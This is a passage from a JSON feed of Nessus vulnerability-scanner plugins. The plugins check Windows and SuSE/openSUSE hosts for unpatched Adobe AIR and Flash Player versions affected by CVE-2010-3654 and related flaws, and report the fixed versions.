attribute:\"solution\",\n value:\"Upgrade to Adobe AIR 2.5.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nfix = '2.5.1.17730';\nfix_ui = '2.5.1';\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + '\\n';\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n exit(0);\n}\nelse exit(0, \"The Adobe AIR \"+version_report+\" install is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:33:43", "description": "The remote Windows host contains a version of Adobe Flash Player 9.x\nbefore 9.0.289 or 10.x 
earlier than 10.1.102.64. Such versions are\npotentially affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists that could lead\n to code execution. Note that there are reports that \n this is being actively exploited in the wild. \n (CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. 
(CVE-2010-3976)", "edition": 24, "published": "2010-11-05T00:00:00", "title": "Flash Player < 9.0.289 / 10.1.102.64 Multiple Vulnerabilities (APSB10-26)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB10-26.NASL", "href": "https://www.tenable.com/plugins/nessus/50493", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(50493);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3639\", \"CVE-2010-3640\",\n \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \n \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\",\n \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3652\", \"CVE-2010-3654\", \n \"CVE-2010-3976\");\n script_bugtraq_id(44504, 44671, 44691, 44692);\n script_xref(name:\"CERT\", value:\"298081\");\n script_xref(name:\"Secunia\", value:\"41917\");\n\n script_name(english:\"Flash Player < 9.0.289 / 10.1.102.64 Multiple Vulnerabilities (APSB10-26)\");\n script_summary(english:\"Checks version of Flash Player\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a browser plug-in that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host contains a version of Adobe Flash Player 9.x\nbefore 9.0.289 or 10.x earlier than 10.1.102.64. 
Such versions are\npotentially affected by multiple vulnerabilities :\n\n - A memory corruption vulnerability exists that could lead\n to code execution. Note that there are reports that \n this is being actively exploited in the wild. \n (CVE-2010-3654)\n\n - An input validation issue exists that could lead to a\n bypass of cross-domain policy file restrictions with\n certain server encodings. (CVE-2010-3636)\n\n - A memory corruption vulnerability exists in the ActiveX\n component. (CVE-2010-3637)\n\n - An unspecified issue exists which could lead to a \n denial of service or potentially arbitrary code \n execution. (CVE-2010-3639)\n\n - Multiple memory corruption issues exist that could lead\n to arbitrary code execution. (CVE-2010-3640, \n CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, \n CVE-2010-3644, CVE-2010-3645, CVE-2010-3646,\n CVE-2010-3647, CVE-2010-3648, CVE-2010-3649,\n CVE-2010-3650, CVE-2010-3652)\n \n - A library-loading vulnerability could lead to code \n execution. (CVE-2010-3976)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-26.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Flash Player 10.1.102.64 / 9.0.289 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\",value:\"2010/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/05\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit('SMB/Flash_Player/installed');\n\ninfo = '';\n\nforeach variant (make_list(\"Plugin\", \"ActiveX\", \"Chrome\"))\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n if (!isnull(vers) && !isnull(files))\n {\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (ver)\n {\n iver = split(ver, sep:'.', keep:FALSE);\n for(i=0;i<max_index(iver);i++)\n iver[i] = int(iver[i]);\n \n if (\n (\"Plugin\" >< variant || \"ActiveX\" >< variant) &&\n (\n # nb: versions before 9.0 are not affected.\n (iver[0] == 9 && iver[1] == 0 && iver[2] < 289) ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 1 ||\n (\n iver[1] == 1 &&\n (\n iver[2] < 102 ||\n (iver[2] == 102 && iver[3] < 64)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for 
Internet Explorer)';\n }\n \n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n \n if (iver[0] == 9) info += '\\n Fixed version : 9.0.289\\n';\n else if (iver[0] == 10) info += '\\n Fixed version : 10.1.102.64\\n';\n }\n else if (\n (\"Chrome\" >< variant) && (\n iver[0] < 10 ||\n (\n iver[0] == 10 &&\n (\n iver[1] < 1 ||\n (\n iver[1] == 1 &&\n (\n iver[2] < 103 ||\n (iver[2] == 103 && iver[3] < 19)\n )\n )\n )\n )\n )\n )\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n\n info += '\\n Product: Browser Plugin (for Google Chrome)';\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver ;\n info += '\\n Fixed version : 10.1.103.19 (as included with Google Chrome 7.0.517.44)\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:info);\n else\n security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, 'The host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:10:34", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.", "edition": 23, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : flash-player (SAT Patch Numbers 3475 / 3477)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2010-12-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:flash-player"], "id": "SUSE_11_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/50904", "sourceData": 
"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50904);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : flash-player (SAT Patch Numbers 3475 / 3477)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3636.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3638.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3639.html\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3641.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3642.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3643.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3644.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3645.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3646.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3647.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3648.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3649.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3650.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3651.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3652.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3654.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3976.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3475 / 3477 as appropriate.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif 
(isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"flash-player-10.1.102.64-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"flash-player-10.1.102.64-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:07:11", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976", "edition": 23, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-3474)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2014-06-13T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_3_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/75493", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# 
(C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-3474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75493);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-3474)\");\n script_summary(english:\"Check for the flash-player-3474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", 
ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"flash-player-10.1.102.64-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:05:41", "description": "Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976", "edition": 23, "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : flash-player (flash-player-3474)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3648", "CVE-2010-3640", "CVE-2010-3651", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-3637", "CVE-2010-3645", "CVE-2010-3638", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-3976", "CVE-2010-3650", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-3649"], "modified": "2011-05-05T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:flash-player"], "id": "SUSE_11_2_FLASH-PLAYER-101104.NASL", "href": "https://www.tenable.com/plugins/nessus/53718", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-3474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(53718);\n 
script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-3636\", \"CVE-2010-3637\", \"CVE-2010-3638\", \"CVE-2010-3639\", \"CVE-2010-3640\", \"CVE-2010-3641\", \"CVE-2010-3642\", \"CVE-2010-3643\", \"CVE-2010-3644\", \"CVE-2010-3645\", \"CVE-2010-3646\", \"CVE-2010-3647\", \"CVE-2010-3648\", \"CVE-2010-3649\", \"CVE-2010-3650\", \"CVE-2010-3651\", \"CVE-2010-3652\", \"CVE-2010-3654\", \"CVE-2010-3976\");\n\n script_name(english:\"openSUSE Security Update : flash-player (flash-player-3474)\");\n script_summary(english:\"Check for the flash-player-3474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to version 10.1.102.64 to fix a\ncritical security issue.\n\nCVE-2010-3636 CVE-2010-3637 CVE-2010-3638 CVE-2010-3639 CVE-2010-3640\nCVE-2010-3641 CVE-2010-3642 CVE-2010-3643 CVE-2010-3644 CVE-2010-3645\nCVE-2010-3646 CVE-2010-3647 CVE-2010-3648 CVE-2010-3649 CVE-2010-3650\nCVE-2010-3651 CVE-2010-3652 CVE-2010-3654 CVE-2010-3976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=650145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"Button\" Remote Code Execution');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 